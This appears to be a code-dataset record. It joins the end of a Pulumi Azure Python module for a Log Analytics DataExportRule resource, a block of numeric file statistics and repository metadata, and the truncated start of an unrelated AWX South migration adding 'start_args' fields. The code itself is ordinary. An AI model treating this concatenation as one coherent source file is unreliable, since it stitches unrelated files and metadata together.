:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
if destination_resource_id is not None:
pulumi.set(__self__, "destination_resource_id", destination_resource_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if export_rule_id is not None:
pulumi.set(__self__, "export_rule_id", export_rule_id)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if table_names is not None:
pulumi.set(__self__, "table_names", table_names)
if workspace_resource_id is not None:
pulumi.set(__self__, "workspace_resource_id", workspace_resource_id)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@destination_resource_id.setter
def destination_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_resource_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="exportRuleId")
def export_rule_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the created Data Export Rule.
"""
return pulumi.get(self, "export_rule_id")
@export_rule_id.setter
def export_rule_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "export_rule_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@table_names.setter
def table_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "table_names", value)
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
@workspace_resource_id.setter
def workspace_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_resource_id", value)
class DataExportRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Log Analytics Data Export Rule.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule",
resource_group_name=example_resource_group.name,
workspace_resource_id=example_analytics_workspace.id,
destination_resource_id=example_account.id,
table_names=["Heartbeat"],
enabled=True)
```
## Import
Log Analytics Data Export Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataExportRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Log Analytics Data Export Rule.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule",
resource_group_name=example_resource_group.name,
workspace_resource_id=example_analytics_workspace.id,
destination_resource_id=example_account.id,
table_names=["Heartbeat"],
enabled=True)
```
## Import
Log Analytics Data Export Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1
```
:param str resource_name: The name of the resource.
:param DataExportRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataExportRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataExportRuleArgs.__new__(DataExportRuleArgs)
if destination_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'destination_resource_id'")
__props__.__dict__["destination_resource_id"] = destination_resource_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if table_names is None and not opts.urn:
raise TypeError("Missing required property 'table_names'")
__props__.__dict__["table_names"] = table_names
if workspace_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'workspace_resource_id'")
__props__.__dict__["workspace_resource_id"] = workspace_resource_id
__props__.__dict__["export_rule_id"] = None
super(DataExportRule, __self__).__init__(
'azure:loganalytics/dataExportRule:DataExportRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
export_rule_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None) -> 'DataExportRule':
"""
Get an existing DataExportRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DataExportRuleState.__new__(_DataExportRuleState)
__props__.__dict__["destination_resource_id"] = destination_resource_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["export_rule_id"] = export_rule_id
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["table_names"] = table_names
__props__.__dict__["workspace_resource_id"] = workspace_resource_id
return DataExportRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> pulumi.Output[str]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="exportRuleId")
def export_rule_id(self) -> pulumi.Output[str]:
"""
The ID of the created Data Export Rule.
"""
return pulumi.get(self, "export_rule_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> pulumi.Output[Sequence[str]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> pulumi.Output[str]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
| 51.226611
| 264
| 0.679992
| 3,017
| 24,640
| 5.340404
| 0.069274
| 0.068955
| 0.063431
| 0.06281
| 0.895606
| 0.877607
| 0.860477
| 0.842664
| 0.831058
| 0.805487
| 0
| 0.004377
| 0.230479
| 24,640
| 480
| 265
| 51.333333
| 0.845367
| 0.430682
| 0
| 0.646825
| 1
| 0
| 0.118631
| 0.045223
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15873
| false
| 0.003968
| 0.019841
| 0
| 0.27381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a6e982c4da187823675fc22557e03519217dd44
| 48,508
|
py
|
Python
|
awx/main/south_migrations/0034_v148_changes.py
|
alexander-bauer/awx
|
d1319b739406dad988f97c41cb92093f180ba822
|
[
"Apache-2.0"
] | 1
|
2021-06-11T20:01:06.000Z
|
2021-06-11T20:01:06.000Z
|
awx/main/south_migrations/0034_v148_changes.py
|
alexander-bauer/awx
|
d1319b739406dad988f97c41cb92093f180ba822
|
[
"Apache-2.0"
] | 4
|
2020-04-29T23:03:16.000Z
|
2022-03-01T23:56:09.000Z
|
awx/main/south_migrations/0034_v148_changes.py
|
alexander-bauer/awx
|
d1319b739406dad988f97c41cb92093f180ba822
|
[
"Apache-2.0"
] | 1
|
2018-06-06T08:47:22.000Z
|
2018-06-06T08:47:22.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ProjectUpdate.start_args'
db.add_column(u'main_projectupdate', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'Job.start_args'
db.add_column(u'main_job', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'InventoryUpdate.start_args'
db.add_column(u'main_inventoryupdate', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'ProjectUpdate.start_args'
db.delete_column(u'main_projectupdate', 'start_args')
# Deleting field 'Job.start_args'
db.delete_column(u'main_job', 'start_args')
# Deleting field 'InventoryUpdate.start_args'
db.delete_column(u'main_inventoryupdate', 'start_args')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.activitystream': {
'Meta': {'object_name': 'ActivityStream'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'activity_stream'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'changes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'credential': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Credential']", 'symmetrical': 'False', 'blank': 'True'}),
'group': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Host']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Inventory']", 'symmetrical': 'False', 'blank': 'True'}),
'inventory_source': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.InventorySource']", 'symmetrical': 'False', 'blank': 'True'}),
'inventory_update': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.InventoryUpdate']", 'symmetrical': 'False', 'blank': 'True'}),
'job': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Job']", 'symmetrical': 'False', 'blank': 'True'}),
'job_template': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.JobTemplate']", 'symmetrical': 'False', 'blank': 'True'}),
'object1': ('django.db.models.fields.TextField', [], {}),
'object2': ('django.db.models.fields.TextField', [], {}),
'object_relationship_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'operation': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'organization': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Organization']", 'symmetrical': 'False', 'blank': 'True'}),
'permission': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Project']", 'symmetrical': 'False', 'blank': 'True'}),
'project_update': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.ProjectUpdate']", 'symmetrical': 'False', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
},
'main.authtoken': {
'Meta': {'object_name': 'AuthToken'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'request_hash': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_tokens'", 'to': u"orm['auth.User']"})
},
'main.credential': {
'Meta': {'unique_together': "[('user', 'team', 'kind', 'name')]", 'object_name': 'Credential'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cloud': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'credential\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'default': "'ssh'", 'max_length': '32'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'credential\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'password': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'ssh_key_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'ssh_key_unlock': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'sudo_password': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'sudo_username': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'credentials'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Team']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'credentials'", 'null': 'True', 'blank': 'True', 'to': u"orm['auth.User']"}),
'username': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'})
},
'main.group': {
'Meta': {'unique_together': "(('name', 'inventory'),)", 'object_name': 'Group'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'group\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'groups_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'groups'", 'blank': 'True', 'to': "orm['main.Host']"}),
'hosts_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'groups'", 'to': "orm['main.Inventory']"}),
'inventory_sources': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'groups'", 'blank': 'True', 'to': "orm['main.InventorySource']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'group\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'parents': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'children'", 'blank': 'True', 'to': "orm['main.Group']"}),
'total_groups': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_hosts': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.host': {
'Meta': {'unique_together': "(('name', 'inventory'),)", 'object_name': 'Host'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'host\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts'", 'to': "orm['main.Inventory']"}),
'inventory_sources': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'hosts'", 'blank': 'True', 'to': "orm['main.InventorySource']"}),
'last_job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts_as_last_job+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Job']", 'blank': 'True', 'null': 'True'}),
'last_job_host_summary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts_as_last_job_summary+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobHostSummary']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'host\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.inventory': {
'Meta': {'unique_together': "[('name', 'organization')]", 'object_name': 'Inventory'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventory\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'groups_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hosts_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_sources_with_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventory\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventories'", 'to': "orm['main.Organization']"}),
'total_groups': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_hosts': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_inventory_sources': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.inventorysource': {
'Meta': {'object_name': 'InventorySource'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventorysource\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_sources'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Credential']"}),
'current_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_source_as_current_update+'", 'null': 'True', 'to': "orm['main.InventoryUpdate']"}),
